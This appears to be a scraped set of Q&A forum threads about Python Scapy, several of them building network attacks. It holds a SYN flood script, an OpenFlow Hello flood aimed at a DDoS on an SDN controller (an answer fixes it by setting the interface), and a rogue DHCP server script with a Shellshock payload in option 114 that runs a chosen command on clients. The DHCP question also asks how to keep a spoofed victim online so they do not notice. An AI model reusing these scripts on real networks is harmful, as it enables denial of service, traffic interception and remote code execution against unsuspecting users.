I wrote a code to send a packet from my Kali Linux machine to my Windows PC but the packet doesn't show in Wireshark. There are no errors in the code and it sends the packets but they are not received.
Any one can help ?
#!/usr/bin/python
from scapy.all import *
def synflood(src,tgt,message):
for dport in range(1024,65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=4444, dport=dport)
RAWlayer = Raw(load=message)
pkt = IPlayer/TCPlayer
send(pkt)
source = input("src: ")
target = input("targert : ")
message = input(" load : ")
while True:
synflood(source,target,message)
Update: So i fixed the problem! i tried replacing the for statement by "dport = 80" and for the target IP i chose another dest IP than my pc aand it showed up in wireshark, that's how i realised that i should configure an internal VM network instead of the bridged one , and it worked
Related
I am trying to fetch an ip address of a remote machine B from my machine A using mac address of Machine B. Both A & B are on same subnet. I am trying to use Scapy library in python and issuing a RARP request.
Below is my code. I am getting 0.0.0.0 as ouput.
import scapy.all as scapy
def get_ip(mac):
arp_request=scapy.ARP(op=3, hwdst=mac)
broadcast = scapy.Ether(dst = 'ff:ff:ff:ff:ff:ff')
arp_request_broadcast = broadcast / arp_request
# print('$$$', arp_request_broadcast.show())
answered_list=scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
unanswered_list=scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[1]
response = {'answered_list':answered_list, 'unanswered_list':unanswered_list}
print('unanswered_list',unanswered_list[0].pdst)
return response
macB='Mac address of machine B'
obj=get_ip(macB)
print(obj)
Output:
unanswered_list 0.0.0.0
{'answered_list': <Results: TCP:0 UDP:0 ICMP:0 Other:0>, 'unanswered_list': <Unanswered: TCP:0 UDP:0 ICMP:0 Other:1>}
I'm tryng to read a Pcap file, and after that I get the Ip's and the realtions between Ip's, I want to transform these relattions in MAC relations but I'm not sure how I have to do it.
trafico= rdpcap('example-01.pcap')
unique_streams =[]
for frame in trafico:
packet = frame[IP]
src = packet.src
dst = packet.dst
layer4_segment = packet.payload.name
sport = packet[layer4_segment].sport
dport = packet[layer4_segment].dport
unique_streams.append(f"{src}:{dst}:{layer4_segment}:{sport}:{dport}")
tre= set(unique_streams)
for k in tre:
print(k)
I have these code to show the Ip's source and destination and also the ports
thanks
I don't know how to transform these relations in MAC relations...
To get the MAC from the packet you need to look at the 'Ether' layer and not the'IP' layer:
e = frame[Ether]
print(e.src,e.dst)
e.src is the MAC for the IP packet.src etc.
I am writing a code where I am capturing openflow13 packets using tcpdump and wireshark. I am running mininet topo and floodlight SDN controller. Once I get my SDN controller IP and port details from the capture, I intent to create multiple OFPTHello messages and send it to the SDN Controller [sort of DDoS attack]. Although I am able to extract the controller's details, I am unable to create Scapy OFPTHello message packets.
Request to please help me identify and resolve the issue
Mininet Topo I am running-
sudo mn --topo=linear,4 --mac --controller=remote,ip=192.168.56.102 --switch=ovsk,protocols=OpenFlow13
My Code-
#!/usr/bin/env python3
try:
import time
import subprocess
import json
import sys
from scapy.all import *
from scapy.contrib.openflow import _ofp_header
from scapy.fields import ByteEnumField, IntEnumField, IntField, LongField, PacketField, ShortField, XShortField
from scapy.layers.l2 import Ether
ofp_table = {0xfe: "MAX",
0xff: "ALL"}
ofp_buffer = {0xffffffff: "NO_BUFFER"}
ofp_version = {0x04: "OpenFlow 1.3"}
ofp_type = {0: "OFPT_HELLO"}
class OFPHET(_ofp_header):
#classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 2:
t = struct.unpack("!H", _pkt[:2])[0]
return ofp_hello_elem_cls.get(t, Raw)
return Raw
def extract_padding(self, s):
return b"", s
class OFPTHello(_ofp_header):
name = "OFPT_HELLO"
fields_desc = [ByteEnumField("version", 0x04, ofp_version),
ByteEnumField("type", 0, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketListField("elements", [], OFPHET, length_from=lambda pkt: pkt.len - 8)]
# Capture controller's IP address and Port
Hello_Msg = []
Switch_TCP_Port = []
p = subprocess.Popen(['sudo', 'tcpdump', '-i', 'eth1', 'port', '6653', '-w', 'capture.pcap'], stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
time.sleep(45)
p.terminate()
captures = rdpcap('capture.pcap')
for capture in captures:
msg = (capture.summary()).split(" ")
i = len(msg)
if (msg[i-1] == "OFPTFeaturesRequest"):
Features_Request = capture.summary()
break;
elif (msg[i-1] == "OFPTHello"):
Hello_Msg.append(capture.summary())
for Hello in Hello_Msg:
frame = Hello.split("/")[2]
port = ((frame.split(" ")[2]).split(":"))[1]
Switch_TCP_Port.append(port)
Features_Request = Features_Request.split("/")[2]
Source_Frame = (Features_Request.split(" ")[2]).split(":")
Controller_IP = Source_Frame[0]
Controller_Port = int(Source_Frame[1])
print("\nController's IP Address: %s"%Controller_IP)
print("Controller's Port: %s"%Controller_Port)
# Generating Openfow PAcket_In using Scapy
for p in Switch_TCP_Port:
p = int(p)
packet = Ether(src='08:00:27:fa:75:e9',dst='08:00:27:f1:24:22')/IP(src='192.168.56.101',dst=Controller_IP)/TCP(sport=p,dport=Controller_Port)/OFPTHello()
send(packet)
except ImportError as e:
print ("\n!!! ImportError !!!")
print ("{0}. Install it.\n".format(e))
Wireshark Capture- [Only has 4 hello packets, no Scapy packets are captured]
Question/Issue- I am able to receive the ideal number of 4 hello packets from the mininet topology. However, the new hello packets I am trying to create using scapy are not being sent/ captured by wireshark. I have attached my scapy code for reference.
In your code do this
modify the line:
send(packet)
To
send(packet,iface='eth1') where eth1 is the egress interface of the attacking VM
The reason is that even if a malformed Openflow packet is put on the wire, Wireshark will still be able to capture it, assuming your attack VM has a route to the controller VM. This means that your code is not putting the Packet on the right wire, send(packet,iface='eth1') will put it on the right wire.
I'm performing a dhcp spoofing attack. First I run a dhcp starvation attack which depletes the ip pool of my router. Then I execute the dhcp spoofing code which assigns a fake ip to my victim device, when it tries to connect to the wireless router.
My problem is, after my victim device is assigned the fake ip it can no longer access the internet. In a real case scenario, if the victim gets disconnected from the internet, they will know something is wrong, also there's no point to a spoofing attack if I cannot see the victim's activity.
So, how do I connect my victim to the internet with the fake ip? yes i know the DHCP rouge server will act as the real server for the victim, but how exactly is the implementation supposed to be, since in my case the dhcp rouge server is my pc and not a router.
Here is the dhcp spoofing code taken from github.
#! /usr/bin/env python
#Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
import binascii
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
parser = argparse.ArgumentParser(description='DHCPSock', epilog='Shock dem shells!')
parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use')
parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]')
args = parser.parse_args()
command = args.cmd or "echo 'pwned'"
if os.geteuid() != 0:
sys.exit("Run me as r00t")
#BOOTP
#siaddr = DHCP server ip
#yiaddr = ip offered to client
#xid = transaction id
#chaddr = clients mac address in binary format
def dhcp_offer(raw_mac, xid):
print "in dhcp_offer"
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
#print packet.show()
return packet
def dhcp_ack(raw_mac, xid, command):
print "in dhcp_ack"
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(114, "() { ignored;}; " + command),
"end"]))
#print packet.show()
return packet
def dhcp(resp):
if resp.haslayer(DHCP):
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
xid = resp[BOOTP].xid
print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending OFFER..."
packet = dhcp_offer(raw_mac, xid)
#packet.plot(lambda x:len(x))
#packet.pdfdump("test.pdf")
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
if resp[DHCP].options[0][1] == 3:
xid = resp[BOOTP].xid
print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending ACK..."
packet = dhcp_ack(raw_mac, xid, command)
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
print "[*] Waiting for a DISCOVER..."
sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface)
#sniff(filter="udp and (port 67 or 68)", prn=dhcp)
I have a tplink-wr703n wireless router with OpenWrt.
I know I can capture all kinds of data when the adapter is in monitor mode.
I want to the adapter work in master mode, and I also want to capture probe request data sent from client or probe response data sent from my router.
I have tried to use libpcap to capture data, but I failed.
Can you tell me how I can get that data?
You can set up several modes on one radio card simultaneously.
Using the "iw" command you should be able to create a secondary wifi device interface with type monitor, I guess you could read all frame types from this one.
See http://wireless.kernel.org/en/users/Documentation/iw/vif/
I am also trying to prepare a scapy script to capture probe request only.
there is an Indian guy who made this nice video:https://www.youtube.com/watch?v=Z1MbpIkzQjU
His script seems to work in his enviroment but for some reason I cant get this to work for me.
I will appreciate your assistance.
The script is:
#!/usr/bin/python
import sys
from scapy.all import *
clientprobes = set()
def PacketHandler(pkt):
if pkt.haslayer(Dot11ProbeReq):
if len(pkt.info) > 0:
testcase = pkt.addr2 + '_ _ _' + pkt.info
if testcase not in clientprobes:
clientprobes.add(testcase)
print "New Probe Found: " + pkt.addr2 + ' ' + pkt.info
print "\n-----------Client Probes Table-------------\n"
counter = 1
for probe in clientprobes:
[client, ssid] = probe.split('---')
print counter, client, ssid
counter = counter + 1
print "\n--------------------------------------------\n"
sniff(iface = sys.argv[1], count = int(sys.argv[2]), prn = PacketHandler)